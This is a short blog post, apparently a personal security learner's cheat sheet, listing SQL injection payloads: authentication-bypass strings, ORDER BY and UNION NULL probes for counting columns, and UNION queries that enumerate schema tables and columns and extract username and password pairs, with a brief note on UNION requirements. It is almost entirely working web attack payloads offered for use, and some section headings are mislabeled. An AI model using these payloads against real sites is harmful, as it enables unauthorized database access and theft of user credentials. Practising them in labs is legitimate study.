Some Basics of SQLi
Some of the common SQLi commands which are important to perform SQL injection attack:
General :
‘ or ‘1’ = ‘1
‘ or ‘1’ = ‘1’
‘ or ‘1’ = ‘1 — -
‘ or ‘1’ = ‘1 #
1 UNION SELECT 1,2,3
For UNION Attack :
0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = ‘sqli_one’
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = ‘staff_users’
0 UNION SELECT 1,2,group_concat(username,’:’,password SEPARATOR ‘<br>’) FROM staff_users
In-Blind SQL :
‘ OR 1=1; —
select * from users where username=’’ and password=’’ OR 1=1;
Bypass authentication :
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
#determine the number of columns
‘ ORDER BY 1 —
‘ ORDER BY 2 —
‘ ORDER BY 3 —
‘ UNION SELECT NULL —
‘ UNION SELECT NULL,NULL —
‘ UNION SELECT NULL,NULL,NULL —
Union attacks :
‘ UNION SELECT username || ‘~’ || password FROM users — #|| — concat , ~ seperator
For Oracle Version :
‘+UNION+SELECT+NULL,username||’~’||password+FROM+users —
For a
UNION
query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible with the individual queries.
To carry out a SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out:
- How many columns are being returned from the original query?
Which columns returned from the original query are of a suitable data type to hold the results from the injected query?
Happy Hacking H4ck3r😇
This is my Blog site: MyCyberSecurityJourney